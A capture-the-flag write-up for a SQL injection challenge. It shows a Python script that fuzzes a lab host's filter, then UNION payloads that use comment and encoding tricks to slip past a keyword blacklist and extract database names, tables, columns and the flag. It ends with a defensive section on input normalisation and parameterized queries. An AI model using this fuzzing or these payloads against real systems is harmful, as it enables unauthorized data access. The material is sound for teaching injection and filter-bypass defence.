1. Open the environment and look at the source code.
The source exposes a variable `wllm`; passing `1'` produces an error, so the parameter is SQL-injectable. Next, run a fuzz test to map which tokens the application blocks.
A simple Python script:
import requests

# Candidate SQL keywords, operators and encodings; each entry is sent once as the wllm parameter.
fuzz={'length ','+','handler','like','select','sleep','database','delete','having','or','as','-~','BENCHMARK','limit','left','select','insert'
,'sys.schema_auto_increment_columns','join','right','#','&','&&','\\','handler','---','--','--+','INFORMATION','--',';','!','%','+','xor','<>'
,'(','>','<',')','.','^','=','AND','BY','CAST','COLUMN','COUNT','CREATE','END','case',"'1'='1'",'when',"admin'",'length','+','REVERSE','ascii'
,'select','database','left','right','union','||','oorr','/','//','//*','*/*','/**/','anandd','GROUP','HAVING','IF','INTO','JOIN','LEAVE','LEFT'
,'LEVEL','sleep','LIKE','NAMES','NEXT','NULL','OF','ON','|','infromation_schema','user','OR','ORDER','ORD','SCHEMA','SELECT','SET','TABLE','THEN'
,'UPDATE','USER','USING','VALUE','VALUES','WHEN','WHERE','ADD','AND','prepare','set','update','delete','drop','inset','CAST','COLUMN','CONCAT'
,'GROUP_CONCAT','group_concat','CREATE','DATABASE','DATABASES','alter','DELETE','DROP','floor','rand()','information_schema.tables','TABLE_SCHEMA'
,'%df','concat_ws()','concat','LIMIT','ORD','ON'
,'extractvalue','order','CAST()','by','ORDER','OUTFILE','RENAME','REPLACE','SCHEMA','SELECT','SET','updatexml','SHOW','SQL','TABLE','THEN','TRUE','instr'
,'benchmark','format','bin','substring','ord','UPDATE','VALUES','VARCHAR','VERSION','WHEN','WHERE','/*','`',',','users','%0a','%0b','mid','for','BEFORE','REGEXP'
,'RLIKE','in','sys schemma','SEPARATOR','XOR','CURSOR','FLOOR','sys.schema_table_statistics_with_buffer','INFILE','count','%0c','from','%0d','%a0','=','@','else'}

for i in fuzz:
    # The entry is placed directly in the query string, so percent-encoded entries such as %0a reach the server as-is.
    res = requests.get('http://1.14.71.254:28315/?wllm={}'.format(i), timeout=10)
    # The application returns this notice ("illegal operation is not allowed") whenever a blocked token is present.
    if '请勿非法操作' in res.text:
        print(i)
Result (tokens that triggered the notice):
update
AND
DELETE
UPDATE
insert
updatexml
length
delete
right
extractvalue
REVERSE
sys schemma
+
=
--+
left
handler
substring
rand()
LEFT
anandd
OUTFILE
INTO
'1'='1'
So both `=` and the space character are filtered (the `+` hit is a space after URL decoding), along with the keywords listed above; `union`, `select`, `order`, `by`, `group_concat`, `mid` and `/**/` are not.
This gives the following payloads:
-1'/**/order/**/by/**/4%23 (find the column count; %23 stands in for # and /**/ for the space)
-1'/**/union/**/select/**/1,database(),3%23 (dump the database name)
-1'/**/union/**/select/**/1,group_concat(table_name),3/**/from/**/information_schema.tables/**/where/**/table_schema/**/like()%23 (dump the table names)
-1'/**/union/**/select/**/1,group_concat(column_name),3/**/from/**/information_schema.columns/**/where/**/table_name/**/like()%23 (dump the column names)
-1'/**/union/**/select/**/1,flag,3/**/from/**/''%23 (only part of the flag is returned)
-1'/**/union/**/select/**/1,mid(group_concat(id,flag),20,40),3/**/from/**/''%23 (extract the full flag with mid())
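The filter that the fuzz results above imply, rebuilt as an added example that is not part of this write-up or of the challenge, beside the two defensive responses: normalizing the input before matching (which catches the /**/ and %23 substitutions the payloads above rely on) and the real fix, a parameterized query. The blacklist contents are an assumption inferred from the hit list, and the table `t` and its rows are constructed sample data.

```python
import re
import sqlite3
from urllib.parse import unquote

# Substring blacklist inferred from the fuzz hits above (an assumption about the
# challenge's filter, not its real code): every flagged entry either is one of
# these or contains one ('handler' and 'rand()' contain 'and', '--+' contains
# '+', "'1'='1'" contains '=', 'sys schemma' contains a space).
BLACKLIST = ("update", "and", "delete", "insert", "length", "left", "right",
             "extractvalue", "reverse", "substring", "outfile", "into",
             "+", "=", " ")

def blacklist_rejects(value: str) -> bool:
    """Case-insensitive substring filter of the kind the fuzz run maps out."""
    low = value.lower()
    return any(word in low for word in BLACKLIST)

def normalized_rejects(value: str) -> bool:
    """Same filter, applied after undoing the two substitutions used above:
    URL-decode (%23 -> #) and collapse inline comments /**/ to a space."""
    decoded = unquote(value)
    collapsed = re.sub(r"/\*.*?\*/", " ", decoded)
    return blacklist_rejects(collapsed)

def demo_db() -> sqlite3.Connection:
    # Constructed sample table; the challenge's real table name is not given.
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE t (id INTEGER, flag TEXT)")
    con.executemany("INSERT INTO t VALUES (?, ?)",
                    [(1, "demo{part-1}"), (2, "demo{part-2}")])
    return con

def lookup_parameterized(con: sqlite3.Connection, value: str) -> list:
    """The actual fix: a bound parameter is data, so no keyword filter is
    needed and comment padding cannot change the query's structure."""
    return con.execute("SELECT id, flag FROM t WHERE id = ?", (value,)).fetchall()

# Payloads exactly as written in this write-up.
PAYLOAD_ORDER = "-1'/**/order/**/by/**/4%23"
PAYLOAD_DB = "-1'/**/union/**/select/**/1,database(),3%23"

if __name__ == "__main__":
    for p in (PAYLOAD_ORDER, PAYLOAD_DB):
        print(p, "raw filter rejects:", blacklist_rejects(p),
              "normalized filter rejects:", normalized_rejects(p))
    print(lookup_parameterized(demo_db(), PAYLOAD_DB))
```

Normalization only closes the specific gap the write-up found; a blacklist stays a guessing game, whereas the bound parameter removes the injection regardless of encoding.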
Key points:
1. Fuzz testing
2. SQL injection
3. Using the mid() function